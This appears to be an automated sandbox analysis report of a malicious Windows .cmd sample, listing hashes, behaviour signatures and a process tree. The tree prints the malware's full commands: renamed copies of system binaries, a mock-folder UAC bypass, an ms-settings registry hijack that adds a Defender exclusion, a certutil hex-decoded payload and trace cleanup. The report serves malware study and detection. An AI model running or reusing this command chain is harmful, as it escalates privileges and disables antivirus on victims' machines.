Analysis
-
max time kernel
147s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
09-05-2024 09:54
Static task
static1
Behavioral task
behavioral1
Sample
17173318465.zip
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
17173318465.zip
Resource
win10v2004-20240426-en
General
-
Target
17173318465.zip
-
Size
1002KB
-
MD5
ed0ed615d8c62f8a55f9b6d56b3b8aff
-
SHA1
c91b96e4775a686c2bfcae1a9d8eb9f744de995a
-
SHA256
99c9604c43f258385150f75b5df3e7d7a4a2c5364ed7d0ce592a90ea3b076323
-
SHA512
db6fd59264b8fd3964235605c5eebad17bf4ac4caf111c84eb1689ebb42bb18a15cc36fc6d9361ab85bc02d165f14515ef3945c5ad34fe51bdb8af03a91e8c05
-
SSDEEP
24576:m4SvFvkv07m+98vcV8+TPbk7ImwqtfK9f+hYz3G3Y/ummbLv:m4kFMc7398vwTRm9okOz3G3cov
Malware Config
Signatures
-
Executes dropped EXE 25 IoCs
pid Process 2572 alpha.exe 2528 alpha.exe 2544 alpha.exe 3048 alpha.exe 1688 alpha.exe 2864 alpha.exe 2892 alpha.exe 2896 xkn.exe 1468 alpha.exe 308 ger.exe 1676 alpha.exe 1572 kn.exe 1608 alpha.exe 2764 kn.exe 1968 alpha.exe 2620 alpha.exe 1428 sppsvc.pif 1772 alpha.exe 2044 alpha.exe 1212 alpha.exe 2260 alpha.exe 2328 alpha.exe 1508 alpha.exe 1904 alpha.exe 1076 alpha.exe -
Loads dropped DLL 8 IoCs
pid Process 2760 cmd.exe 2892 alpha.exe 2896 xkn.exe 2896 xkn.exe 1468 alpha.exe 1676 alpha.exe 1936 WerFault.exe 1936 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1936 1428 WerFault.exe 58 -
Kills process with taskkill 1 IoCs
pid Process 1952 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1632 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1428 sppsvc.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2896 xkn.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeRestorePrivilege 2964 7zFM.exe Token: 35 2964 7zFM.exe Token: SeSecurityPrivilege 2964 7zFM.exe Token: SeDebugPrivilege 2896 xkn.exe Token: SeDebugPrivilege 1952 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2964 7zFM.exe 2964 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2760 wrote to memory of 2688 2760 cmd.exe 33 PID 2760 wrote to memory of 2688 2760 cmd.exe 33 PID 2760 wrote to memory of 2688 2760 cmd.exe 33 PID 2760 wrote to memory of 2572 2760 cmd.exe 34 PID 2760 wrote to memory of 2572 2760 cmd.exe 34 PID 2760 wrote to memory of 2572 2760 cmd.exe 34 PID 2760 wrote to memory of 2528 2760 cmd.exe 35 PID 2760 wrote to memory of 2528 2760 cmd.exe 35 PID 2760 wrote to memory of 2528 2760 cmd.exe 35 PID 2760 wrote to memory of 2544 2760 cmd.exe 36 PID 2760 wrote to memory of 2544 2760 cmd.exe 36 PID 2760 wrote to memory of 2544 2760 cmd.exe 36 PID 2544 wrote to memory of 2596 2544 alpha.exe 37 PID 2544 wrote to memory of 2596 2544 alpha.exe 37 PID 2544 wrote to memory of 2596 2544 alpha.exe 37 PID 2760 wrote to memory of 3048 2760 cmd.exe 38 PID 2760 wrote to memory of 3048 2760 cmd.exe 38 PID 2760 wrote to memory of 3048 2760 cmd.exe 38 PID 3048 wrote to memory of 2148 3048 alpha.exe 39 PID 3048 wrote to memory of 2148 3048 alpha.exe 39 PID 3048 wrote to memory of 2148 3048 alpha.exe 39 PID 2760 wrote to memory of 1688 2760 cmd.exe 40 PID 2760 wrote to memory of 1688 2760 cmd.exe 40 PID 2760 wrote to memory of 1688 2760 cmd.exe 40 PID 1688 wrote to memory of 1168 1688 alpha.exe 41 PID 1688 wrote to memory of 1168 1688 alpha.exe 41 PID 1688 wrote to memory of 1168 1688 alpha.exe 41 PID 2760 wrote to memory of 2184 2760 cmd.exe 42 PID 2760 wrote to memory of 2184 2760 cmd.exe 42 PID 2760 wrote to memory of 2184 2760 cmd.exe 42 PID 2760 wrote to memory of 2864 2760 cmd.exe 43 PID 2760 wrote to memory of 2864 2760 cmd.exe 43 PID 2760 wrote to memory of 2864 2760 cmd.exe 43 PID 2864 wrote to memory of 2828 2864 alpha.exe 44 PID 2864 wrote to memory of 2828 2864 alpha.exe 44 PID 2864 wrote to memory of 2828 2864 alpha.exe 44 PID 2760 wrote to memory of 2892 2760 cmd.exe 45 PID 2760 wrote to memory of 2892 2760 cmd.exe 45 PID 2760 wrote to memory of 2892 2760 cmd.exe 45 PID 2892 wrote to memory of 2896 2892 alpha.exe 46 PID 2892 wrote to memory of 2896 2892 alpha.exe 46 PID 2892 wrote to memory of 2896 2892 alpha.exe 46 PID 2896 wrote to memory of 1468 2896 xkn.exe 47 PID 2896 wrote to memory of 1468 2896 xkn.exe 47 PID 2896 wrote to memory of 1468 2896 xkn.exe 47 PID 1468 wrote to memory of 308 1468 alpha.exe 48 PID 1468 wrote to memory of 308 1468 alpha.exe 48 PID 1468 wrote to memory of 308 1468 alpha.exe 48 PID 2760 wrote to memory of 1676 2760 cmd.exe 49 PID 2760 wrote to memory of 1676 2760 cmd.exe 49 PID 2760 wrote to memory of 1676 2760 cmd.exe 49 PID 1676 wrote to memory of 1572 1676 alpha.exe 50 PID 1676 wrote to memory of 1572 1676 alpha.exe 50 PID 1676 wrote to memory of 1572 1676 alpha.exe 50 PID 2760 wrote to memory of 1608 2760 cmd.exe 51 PID 2760 wrote to memory of 1608 2760 cmd.exe 51 PID 2760 wrote to memory of 1608 2760 cmd.exe 51 PID 1608 wrote to memory of 2764 1608 alpha.exe 52 PID 1608 wrote to memory of 2764 1608 alpha.exe 52 PID 1608 wrote to memory of 2764 1608 alpha.exe 52 PID 2760 wrote to memory of 1968 2760 cmd.exe 53 PID 2760 wrote to memory of 1968 2760 cmd.exe 53 PID 2760 wrote to memory of 1968 2760 cmd.exe 53 PID 1968 wrote to memory of 1952 1968 alpha.exe 54
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17173318465.zip1⤵PID:2812
-
C:\Windows\system32\verclsid.exe"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x4011⤵PID:2152
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17173318465.zip"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2964
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2688
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:2572
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2528
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:2596
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2148
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:1168
-
-
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\WSReset.exe "C:\\Windows \\System32\\itsme.exe"2⤵PID:2184
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2828
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:308
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 93⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 123⤵
- Executes dropped EXE
PID:2764
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 22⤵
- Executes dropped EXE
PID:2620 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 23⤵
- Runs ping.exe
PID:1632
-
-
-
C:\Users\Public\Libraries\sppsvc.pifC:\Users\Public\Libraries\sppsvc.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1428 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 6963⤵
- Loads dropped DLL
- Program crash
PID:1936
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:1772
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:1212
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2260
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1508
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1904
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1076
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.2MB
MD5366a8d4073f8409849e001e7feb3d894
SHA1207a1fc1e41e3e7776511e692a9cb166d59d2d13
SHA2565d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3
SHA512f262b68076974242a84fdd0b301a2307d550dfd9f884801902974e29f0a3d2dc0699e5aaad2c319e6aec87bcdf5190bc11cc938fc69d9668e3b85c57ed0ea51f
-
Filesize
1.1MB
MD5e62ff91b6b729d830b15d8f81bc57ede
SHA138b3ac66c5899d0de5a91f66ecee1cb6e95b2973
SHA25633a072ab2cc4195ed145081a2c88f2b000bdcae9c4b5989c7e9013feabb6ec59
SHA5129ef30e503f09061a72560a384dd25c5028db46154cce430c1db7149cc697c795f86effd691167d61606402927087d0dc34366487ae7714b650bd42919e558d1f
-
Filesize
2.2MB
MD58ab8b1cab45b50b97ff80bff5e10291a
SHA1966cd90ae89517d31fecc7bfaccec8703ddecfdb
SHA2569b6ed53256341d48bc5981e48c8bb1e7547928143af4b33f0433468c7a4e11fd
SHA51202adb968d9a6153fd055cff48aaa7c2328d41a5a14b88b7509955903a12e5c7a07ade608a7ffb54d9bfebe243a7f01d5c9655dcd3276110f32e5ee0b2c322cdf
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d